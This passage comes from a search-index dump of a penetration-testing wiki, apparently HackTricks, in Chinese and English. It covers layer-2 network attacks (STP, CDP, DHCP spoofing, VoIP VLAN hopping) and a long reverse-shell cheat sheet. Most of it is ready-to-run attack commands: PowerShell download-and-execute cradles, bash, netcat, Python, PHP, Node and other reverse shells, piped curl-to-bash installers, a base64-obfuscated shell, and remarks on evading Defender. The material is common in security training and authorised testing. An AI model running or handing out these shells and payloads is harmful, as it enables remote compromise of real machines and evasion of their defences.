root。然后,更多的数据会通过它。这在你连接到两个不同的 switch 时很有用。 这通过发送 BPDUs CONF packets 来完成,声称 priority 值低于当前 root switch 的实际 priority 。 bash yersinia stp -attack 4 #Behaves like the root switch\\nyersinia stp -attack 5 #This will make the device behaves as a switch but will not be root 如果攻击者连接到两台交换机,他可以成为新生成树的根节点,并且这些交换机之间的所有流量都会通过他 (将执行一个 MITM 攻击。) bash yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. 
You can use Ettercap to forward those packets \\"Sniff\\" --> \\"Bridged sniffing\\"\\nettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages","breadcrumbs":"Pentesting Network » STP 攻击","id":"121","title":"STP 攻击"},"1210":{"body":"在 victim machine 上编译 C# 代码。 C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe /unsafe /out:shell.exe shell.cs 你可以从这里下载一个基本的 C# reverse shell: https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc 未被检测到","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » CSC","id":"1210","title":"CSC"},"1211":{"body":"从这里 bash C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\regasm.exe /u \\\\\\\\webdavserver\\\\folder\\\\payload.dll 我还没有尝试过 https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Regasm/Regsvc","id":"1211","title":"Regasm/Regsvc"},"1212":{"body":"来自此处 bash odbcconf /s /a {regsvr \\\\\\\\webdavserver\\\\folder\\\\payload_dll.txt} 我没有尝试过 https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Odbcconf","id":"1212","title":"Odbcconf"},"1213":{"body":"","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Powershell Shells","id":"1213","title":"Powershell Shells"},"1214":{"body":"https://github.com/samratashok/nishang 在 Shells 文件夹中,有很多不同的 shells。要下载并执行 Invoke- PowerShellTcp.ps1 ,请复制该脚本并将其追加到文件末尾: Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444 在 web 服务器上托管该脚本,并在受害者端执行: powershell -exec bypass -c \\"iwr(\'http://10.11.0.134/shell2.ps1\')|iex\\" Defender 目前尚未将其识别为恶意代码(截至 3/04/2019)。 TODO: 检查其他 nishang shells","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » PS-Nishang","id":"1214","title":"PS-Nishang"},"1215":{"body":"https://github.com/besimorhino/powercat 
下载,启动一个 web 服务器,启动 listener,然后在受害者端执行: powershell -exec bypass -c \\"iwr(\'http://10.2.0.5/powercat.ps1\')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd\\" Defender 尚未将其检测为 malicious code(3/04/2019)。 powercat 提供的其他选项: Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files... Serve a cmd Shell:\\npowercat -l -p 443 -e cmd\\nSend a cmd Shell:\\npowercat -c 10.1.1.1 -p 443 -e cmd\\nSend a powershell:\\npowercat -c 10.1.1.1 -p 443 -ep\\nSend a powershell UDP:\\npowercat -c 10.1.1.1 -p 443 -ep -u\\nTCP Listener to TCP Client Relay:\\npowercat -l -p 8000 -r tcp:10.1.1.16:443\\nGenerate a reverse tcp payload which connects back to 10.1.1.15 port 443:\\npowercat -c 10.1.1.15 -p 443 -e cmd -g\\nStart A Persistent Server That Serves a File:\\npowercat -l -p 443 -i C:\\\\inputfile -rep","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » PS-Powercat","id":"1215","title":"PS-Powercat"},"1216":{"body":"https://github.com/EmpireProject/Empire 创建一个 powershell launcher,将其保存到文件中,然后下载并执行它。 powershell -exec bypass -c \\"iwr(\'http://10.2.0.5/launcher.ps1\')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd\\" 检测为恶意 code","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Empire","id":"1216","title":"Empire"},"1217":{"body":"https://github.com/trustedsec/unicorn 使用 unicorn 创建 metasploit 后门的 powershell 版本 python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443 使用已创建的 resource 启动 msfconsole: msfconsole -r unicorn.rc 启动一个 Web 服务器来托管 powershell_attack.txt 文件,并在受害者上执行: powershell -exec bypass -c \\"iwr(\'http://10.2.0.5/powershell_attack.txt\')|iex\\" 已被检测为恶意代码","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » MSF-Unicorn","id":"1217","title":"MSF-Unicorn"},"1218":{"body":"PS>Attack PS 控制台,预加载了一些攻击性 PS 模块(加密) https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9 WinPWN PS 控制台,包含一些攻击性 PS 模块并具备代理检测(IEX)","breadcrumbs":"Reverse 
Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » 更多","id":"1218","title":"更多"},"1219":{"body":"https://highon.coffee/blog/reverse-shell-cheat-sheet/ https://gist.github.com/Arno0x https://github.com/GreatSCT/GreatSCT https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/ https://www.hackingarticles.in/koadic-com-command-control-framework/ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ Check Point Research – Under the Pure Curtain: From RAT to Builder to Coder tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » 参考资料","id":"1219","title":"参考资料"},"122":{"body":"CISCO Discovery Protocol (CDP) 对于 CISCO 设备之间的通信至关重要,允许它们 相互识别并共享配置细节 。 被动数据收集 CDP 被配置为通过所有端口广播信息,这可能导致安全风险。攻击者在连接到交换机端口后,可能会部署像 Wireshark 、 tcpdump 或 Yersinia 这样的网络嗅探器。此类操作可能会暴露关于网络设备的敏感信息,包括其型号和运行的 Cisco IOS 版本。攻击者随后可能针对识别出的 Cisco IOS 版本中的特定漏洞发动攻击。 诱发 CDP 表泛洪 更具攻击性的方法是通过耗尽交换机的内存来发起 Denial of Service (DoS) 攻击,伪装成合法的 CISCO 设备。下面是使用 Yersinia(一款用于测试的网络工具)发起此类攻击的命令序列: bash sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices\\n# Alternatively, for a GUI approach:\\nsudo yersinia -G 在此攻击期间,交换机的 CPU 和 CDP 邻居表会被严重占用,因资源过度消耗而通常称为 “网络瘫痪” 。 CDP Impersonation Attack bash sudo yersinia cdp -attack 2 #Simulate a new CISCO device\\nsudo yersinia cdp -attack 0 #Send a CDP packet You could also use scapy . 
Be sure to install it with scapy/contrib package.","breadcrumbs":"Pentesting Network » CDP 攻击","id":"122","title":"CDP 攻击"},"1220":{"body":"Reading time: 16 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 如果你对这些shell有任何疑问,可以查看 https://explainshell.com/","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Shells - Linux","id":"1220","title":"Shells - Linux"},"1221":{"body":"一旦你获得了反向shell 请阅读此页面以获取完整的TTY 。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Full TTY","id":"1221","title":"Full TTY"},"1222":{"body":"bash curl https://reverse-shell.sh/1.1.1.1:3000 | bash\\nbash -i >& /dev/tcp// 0>&1\\nbash -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP\\n0<&196;exec 196<>/dev/tcp//; sh <&196 >&196 2>&196\\nexec 5<>/dev/tcp//; while read line 0<&5; do $line 2>&5 >&5; done #Short and bypass (credits to Dikline)\\n(sh)0>/dev/tcp/10.10.10.10/9091\\n#after getting the previous shell to get the output to execute\\nexec >&0 不要忘记检查其他 shell:sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh 和 bash。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Bash | sh","id":"1222","title":"Bash | sh"},"1223":{"body":"bash #If you need a more stable connection do:\\nbash -c \'bash -i >& /dev/tcp// 0>&1\' #Stealthier method\\n#B64 encode the shell like: echo \\"bash -c \'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1\'\\" | base64 -w0\\necho bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null Shell 解释 bash -i : 该命令的这一部分启动一个交互式(-i)Bash shell。 >& : 该命令的这一部分是一个简写符号,用于 将标准输出 (stdout)和 标准错误 (stderr) 重定向到同一目的地 。 /dev/tcp// : 这是一个特殊文件, 表示与指定IP地址和端口的TCP连接 。 通过 
将输出和错误流重定向到此文件 ,该命令有效地将交互式shell会话的输出发送到攻击者的机器。 0>&1 : 该命令的这一部分 将标准输入(stdin)重定向到与标准输出(stdout)相同的目的地 。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » 符号安全 shell","id":"1223","title":"符号安全 shell"},"1224":{"body":"bash echo -e \'#!/bin/bash\\\\nbash -i >& /dev/tcp/1/ 0>&1\' > /tmp/sh.sh; bash /tmp/sh.sh;\\nwget http:///shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » 创建文件并执行","id":"1224","title":"创建文件并执行"},"1225":{"body":"当处理基于 Linux 的 web 应用程序中的 Remote Code Execution (RCE) 漏洞时,实现反向 shell 可能会受到网络防御措施的阻碍,例如 iptables 规则或复杂的包过滤机制。在这种受限环境中,另一种方法是建立一个 PTY(伪终端)shell,以更有效地与被攻陷的系统进行交互。 推荐的工具是 toboggan ,它简化了与目标环境的交互。 要有效使用 toboggan,请创建一个针对目标系统 RCE 上下文量身定制的 Python 模块。例如,一个名为 nix.py 的模块可以结构如下: python3 import jwt\\nimport httpx def execute(command: str, timeout: float = None) -> str:\\n# Generate JWT Token embedding the command, using space-to-${IFS} substitution for command execution\\ntoken = jwt.encode(\\n{\\"cmd\\": command.replace(\\" \\", \\"${IFS}\\")}, \\"!rLsQaHs#*&L7%F24zEUnWZ8AeMu7^\\", algorithm=\\"HS256\\"\\n) response = httpx.get(\\nurl=\\"https://vulnerable.io:3200\\",\\nheaders={\\"Authorization\\": f\\"Bearer {token}\\"},\\ntimeout=timeout,\\n# ||BURP||\\nverify=False,\\n) # Check if the request was successful\\nresponse.raise_for_status() return response.text 然后,您可以运行: shell toboggan -m nix.py -i 直接利用交互式 shell。您可以添加 -b 以进行 Burpsuite 集成,并移除 -i 以获得更基本的 rce 包装器。 另一种可能性是使用 IppSec 的前向 shell 实现 https://github.com/IppSec/forward-shell 。 您只需修改: 漏洞主机的 URL 您的有效负载的前缀和后缀(如果有的话) 发送有效负载的方式(头部?数据?额外信息?) 
然后,您可以直接 发送命令 ,甚至 使用 upgrade 命令 来获取完整的 PTY(请注意,管道的读取和写入大约有 1.3 秒的延迟)。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Forward Shell","id":"1225","title":"Forward Shell"},"1226":{"body":"bash nc -e /bin/sh \\nnc | /bin/sh #Blind\\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc >/tmp/f\\nnc | /bin/bash | nc \\nrm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0 1>/tmp/bkpipe","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Netcat","id":"1226","title":"Netcat"},"1227":{"body":"在 https://www.gsocket.io/deploy/ 中查看 bash bash -c \\"$(curl -fsSL gsocket.io/x)\\"","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » gsocket","id":"1227","title":"gsocket"},"1228":{"body":"bash telnet | /bin/sh #Blind\\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet >/tmp/f\\ntelnet | /bin/bash | telnet \\nrm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0 1>/tmp/bkpipe","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Telnet","id":"1228","title":"Telnet"},"1229":{"body":"攻击者 bash while true; do nc -l ; done 要发送命令,请写下它,按回车,然后按CTRL+D(以停止STDIN) 受害者 bash export X=Connected; while true; do X=`eval $(whois -h -p \\"Output: $X\\")`; sleep 1; done","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Whois","id":"1229","title":"Whois"},"123":{"body":"VoIP 电话与 IoT 设备日益集成,提供例如通过特殊电话号码解锁门或控制恒温器等功能。然而,这种集成可能带来安全风险。 工具 voiphopper 被设计用于在多种环境(Cisco、Avaya、Nortel、Alcatel-Lucent)中模拟 VoIP 电话。它通过 CDP、DHCP、LLDP-MED 和 802.1Q ARP 等协议发现语音网络的 VLAN ID。 VoIP Hopper 提供三种用于 Cisco Discovery Protocol (CDP) 的模式: Sniff Mode (-c 0):分析网络数据包以识别 VLAN ID。 Spoof Mode (-c 1):生成自定义数据包以模拟真实 VoIP 设备的包。 Spoof with Pre-made Packet Mode (-c 2):发送与特定 Cisco IP 电话型号完全相同的包。 出于速度考虑首选第三种模式。它需要指定: 攻击者的网络接口(-i 参数)。 被模拟的 VoIP 设备名称(-E 参数),需符合 Cisco 命名格式(例如 SEP 后跟 MAC 地址)。 在企业环境中,为了模拟现有的 VoIP 设备,可以: 检查电话上的 MAC 标签。 在电话显示设置中查看型号信息。 将 VoIP 设备连接到笔记本,并使用 Wireshark 观察 CDP 
请求。 在第三种模式下运行该工具的示例命令如下: bash voiphopper -i eth1 -E \'SEP001EEEEEEEEE \' -c 2","breadcrumbs":"Pentesting Network » VoIP 攻击与 VoIP Hopper 工具","id":"123","title":"VoIP 攻击与 VoIP Hopper 工具"},"1230":{"body":"bash #Linux\\nexport RHOST=\\"127.0.0.1\\";export RPORT=12345;python -c \'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\\"RHOST\\"),int(os.getenv(\\"RPORT\\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\\"/bin/sh\\")\'\\npython -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\"10.0.0.1\\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/sh\\",\\"-i\\"]);\'\\n#IPv6\\npython -c \'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\\"dead:beef:2::125c\\",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn(\\"/bin/sh\\");\'","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Python","id":"1230","title":"Python"},"1231":{"body":"bash perl -e \'use Socket;$i=\\"\\";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\"tcp\\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\\">&S\\");open(STDOUT,\\">&S\\");open(STDERR,\\">&S\\");exec(\\"/bin/sh -i\\");};\'\\nperl -MIO -e \'$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\\"[IPADDR]:[PORT]\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\'","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Perl","id":"1231","title":"Perl"},"1232":{"body":"bash ruby -rsocket -e\'f=TCPSocket.open(\\"10.0.0.1\\",1234).to_i;exec sprintf(\\"/bin/sh -i <&%d >&%d 2>&%d\\",f,f,f)\'\\nruby -rsocket -e \'exit if fork;c=TCPSocket.new(\\"[IPADDR]\\",\\"[PORT]\\");while(cmd=c.gets);IO.popen(cmd,\\"r\\"){|io|c.print io.read}end\'","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » 
Ruby","id":"1232","title":"Ruby"},"1233":{"body":"php // Using \'exec\' is the most common method, but assumes that the file descriptor will be 3.\\n// Using this method may lead to instances where the connection reaches out to the listener and then closes.\\nphp -r \'$sock=fsockopen(\\"10.0.0.1\\",1234);exec(\\"/bin/sh -i <&3 >&3 2>&3\\");\' // Using \'proc_open\' makes no assumptions about what the file descriptor will be.\\n// See https://security.stackexchange.com/a/198944 for more information\\n$sock, 1=>$sock, 2=>$sock), $pipes); ?> /dev/tcp/10.10.14.8/4444 0>&1\'\\"); ?>","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » PHP","id":"1233","title":"PHP"},"1234":{"body":"bash r = Runtime.getRuntime()\\np = r.exec([\\"/bin/bash\\",\\"-c\\",\\"exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \\\\$line 2>&5 >&5; done\\"] as String[])\\np.waitFor()","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Java","id":"1234","title":"Java"},"1235":{"body":"bash victim> ncat --ssl -c \\"bash -i 2>&1\\"\\nattacker> ncat -l --ssl","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Ncat","id":"1235","title":"Ncat"},"1236":{"body":"bash echo \'package main;import\\"os/exec\\";import\\"net\\";func main(){c,_:=net.Dial(\\"tcp\\",\\"192.168.0.134:8080\\");cmd:=exec.Command(\\"/bin/sh\\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}\' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Golang","id":"1236","title":"Golang"},"1237":{"body":"bash #Linux\\nlua -e \\"require(\'socket\');require(\'os\');t=socket.tcp();t:connect(\'10.0.0.1\',\'1234\');os.execute(\'/bin/sh -i <&3 >&3 2>&3\');\\"\\n#Windows & Linux\\nlua5.1 -e \'local host, port = \\"127.0.0.1\\", 4444 local socket = require(\\"socket\\") local tcp = socket.tcp() local io = require(\\"io\\") tcp:connect(host, port); while true 
do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, \'r\') local s = f:read(\\"*a\\") f:close() tcp:send(s) if status == \\"closed\\" then break end end tcp:close()\'","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Lua","id":"1237","title":"Lua"},"1238":{"body":"javascript (function(){\\nvar net = require(\\"net\\"),\\ncp = require(\\"child_process\\"),\\nsh = cp.spawn(\\"/bin/sh\\", []);\\nvar client = new net.Socket();\\nclient.connect(8080, \\"10.17.26.64\\", function(){\\nclient.pipe(sh.stdin);\\nsh.stdout.pipe(client);\\nsh.stderr.pipe(client);\\n});\\nreturn /a/; // Prevents the Node.js application form crashing\\n})(); or require(\'child_process\').exec(\'nc -e /bin/sh [IPADDR] [PORT]\')\\nrequire(\'child_process\').exec(\\"bash -c \'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1\'\\") or -var x = global.process.mainModule.require\\n-x(\'child_process\').exec(\'nc [IPADDR] [PORT] -e /bin/bash\') or // If you get to the constructor of a function you can define and execute another function inside a string\\n\\"\\".sub.constructor(\\"console.log(global.process.mainModule.constructor._load(\\\\\\"child_process\\\\\\").execSync(\\\\\\"id\\\\\\").toString())\\")()\\n\\"\\".__proto__.constructor.constructor(\\"console.log(global.process.mainModule.constructor._load(\\\\\\"child_process\\\\\\").execSync(\\\\\\"id\\\\\\").toString())\\")() or // Abuse this syntax to get a reverse shell\\nvar fs = this.process.binding(\'fs\');\\nvar fs = process.binding(\'fs\'); or https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » NodeJS","id":"1238","title":"NodeJS"},"1239":{"body":"bash # Requires no external binaries; leverages zsh/net/tcp module\\nzsh -c \'zmodload zsh/net/tcp; ztcp ; zsh -i <&$REPLY >&$REPLY 2>&$REPLY\'","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Zsh (内置 
TCP)","id":"1239","title":"Zsh (内置 TCP)"},"124":{"body":"枚举 bash nmap --script broadcast-dhcp-discover\\nStarting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT\\nWARNING: No targets were specified, so 0 hosts scanned.\\nPre-scan script results:\\n| broadcast-dhcp-discover:\\n| Response 1 of 1:\\n| IP Offered: 192.168.1.250\\n| DHCP Message Type: DHCPOFFER\\n| Server Identifier: 192.168.1.1\\n| IP Address Lease Time: 1m00s\\n| Subnet Mask: 255.255.255.0\\n| Router: 192.168.1.1\\n| Domain Name Server: 192.168.1.1\\n|_ Domain Name: mynet\\nNmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds DoS 两种 DoS 类型 可以针对 DHCP 服务器执行。第一个方法是 模拟足够多的假主机以耗尽所有可能的 IP 地址 . 此攻击只有在您能看到 DHCP 服务器的响应并完成协议 ( Discover (Comp) --> Offer (server) --> Request (Comp) --> ACK (server)) 时才会生效。例如,这在 Wifi 网络中不可行 。 另一种针对 DHCP 执行 DoS 的方法是发送 使用每个可能的 IP 作为源地址的 DHCP-RELEASE packet 。然后,服务器将认为所有人都已停止使用这些 IP。 bash yersinia dhcp -attack 1\\nyersinia dhcp -attack 3 #More parameters are needed A more automatic way of doing this is using the tool DHCPing 你可以使用前面提到的 DoS attacks 来强制客户端在环境中获取新的租约,并耗尽合法服务器使其变得无响应。这样当合法设备尝试重新连接时, 你可以提供下一次攻击中提到的恶意值 。 配置恶意值 可以使用位于 /usr/share/responder/DHCP.py 的 DHCP 脚本 来设置一个 rogue DHCP server。此方法对网络攻击很有用,例如通过将流量重定向到恶意服务器来 capture HTTP 流量和凭证。然而,设置 rogue gateway 的效果较差,因为它只允许捕获客户端的出站流量,会错过来自真实 gateway 的响应。相反,建议设置 rogue DNS 或 WPAD 服务器以获得更有效的攻击。 下面是配置 rogue DHCP server 的命令选项: 我们的 IP 地址(网关通告) :Use -i 10.0.0.100 来将你的机器 IP 宣传为网关。 本地 DNS 域名 :可选,Use -d example.org 来设置本地 DNS 域名。 原始路由器/网关 IP :Use -r 10.0.0.1 来指定合法路由器或网关的 IP 地址。 主 DNS 服务器 IP :Use -p 10.0.0.100 将你控制的 rogue DNS 服务器的 IP 设置为主 DNS。 次要 DNS 服务器 IP :可选,Use -s 10.0.0.1 来设置次要 DNS 服务器 IP。 本地网络子网掩码 :Use -n 255.255.255.0 来定义本地网络的子网掩码。 用于 DHCP 流量的接口 :Use -I eth1 在指定的网络接口上监听 DHCP 流量。 WPAD 配置地址 :Use -w “http://10.0.0.100/wpad.dat” 来设置 WPAD 配置地址,以协助拦截 web 流量。 伪造默认网关 IP :包含 -S 来伪造默认 gateway IP。 响应所有 DHCP 请求 :包含 -R 使服务器响应所有 DHCP 请求,但要注意这会产生大量噪音并可能被检测到。 通过正确使用这些选项,可以建立一个 rogue DHCP server 来有效地拦截网络流量。 python # Example to start a rogue 
DHCP server with specified options\\n!python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w \\"http://10.0.0.100/wpad.dat\\" -S -R","breadcrumbs":"Pentesting Network » DHCP 攻击","id":"124","title":"DHCP 攻击"},"1240":{"body":"https://github.com/robiot/rustcat – 现代的类似 netcat 的监听器,用 Rust 编写(自 2024 年起在 Kali 中打包)。 bash # Attacker – interactive TLS listener with history & tab-completion\\nrcat listen -ib 55600 # Victim – download static binary and connect back with /bin/bash\\ncurl -L https://github.com/robiot/rustcat/releases/latest/download/rustcat-x86_64 -o /tmp/rcat \\\\\\n&& chmod +x /tmp/rcat \\\\\\n&& /tmp/rcat connect -s /bin/bash 55600 特性: 可选的 --ssl 标志用于加密传输(TLS 1.3) -s 用于在受害者上生成任何二进制文件(例如 /bin/sh、python3) --up 自动升级为完全交互的 PTY","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Rustcat (rcat)","id":"1240","title":"Rustcat (rcat)"},"1241":{"body":"revsh 是一个小型 C 客户端/服务器,通过 加密的 Diffie-Hellman 隧道 提供完整的 TTY,并可以选择附加 TUN/TAP 接口以进行类似 VPN 的反向跳板。 bash # Build (or grab a pre-compiled binary from the releases page)\\ngit clone https://github.com/emptymonkey/revsh && cd revsh && make # Attacker – controller/listener on 443 with a pinned certificate\\nrevsh -c 0.0.0.0:443 -key key.pem -cert cert.pem # Victim – reverse shell over TLS to the attacker\\n./revsh :443 有用的标志: -b : 绑定 shell 而不是反向 -p socks5://127.0.0.1:9050 : 通过 TOR/HTTP/SOCKS 代理 -t : 创建一个 TUN 接口(反向 VPN) 由于整个会话是加密和多路复用的,它通常可以绕过简单的出站过滤,这会终止明文的 /dev/tcp shell。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » revsh(加密和可用于跳板)","id":"1241","title":"revsh(加密和可用于跳板)"},"1242":{"body":"攻击者(Kali) bash openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate\\nopenssl s_server -quiet -key key.pem -cert cert.pem -port #Here you will be able to introduce the commands\\nopenssl s_server -quiet -key key.pem -cert cert.pem -port #Here yo will be 
able to get the response 受害者 bash #Linux\\nopenssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect : #Windows\\nopenssl.exe s_client -quiet -connect :|cmd.exe|openssl s_client -quiet -connect :","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » OpenSSL","id":"1242","title":"OpenSSL"},"1243":{"body":"https://github.com/andrew-d/static-binaries","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Socat","id":"1243","title":"Socat"},"1244":{"body":"bash victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane\\nattacker> socat FILE:`tty`,raw,echo=0 TCP::1337","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » 绑定 shell","id":"1244","title":"绑定 shell"},"1245":{"body":"bash attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0\\nvictim> socat TCP4::1337 EXEC:bash,pty,stderr,setsid,sigint,sane","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » 反向 shell","id":"1245","title":"反向 shell"},"1246":{"body":"bash awk \'BEGIN {s = \\"/inet/tcp/0//\\"; while(42) { do{ printf \\"shell>\\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \\"exit\\") close(s); }}\' /dev/null","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Awk","id":"1246","title":"Awk"},"1247":{"body":"攻击者 bash while true; do nc -l 79; done 要发送命令,请写下它,按回车,然后按CTRL+D(以停止STDIN) 受害者 bash export X=Connected; while true; do X=`eval $(finger \\"$X\\"@ 2> /dev/null\')`; sleep 1; done export X=Connected; while true; do X=`eval $(finger \\"$X\\"@ 2> /dev/null | grep \'!\'|sed \'s/^!//\')`; sleep 1; done","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Linux » Finger","id":"1247","title":"Finger"},"1248":{"body":"bash #!/usr/bin/gawk -f BEGIN {\\nPort = 8080\\nPrompt = \\"bkd> \\" Service = \\"/inet/tcp/\\" Port 
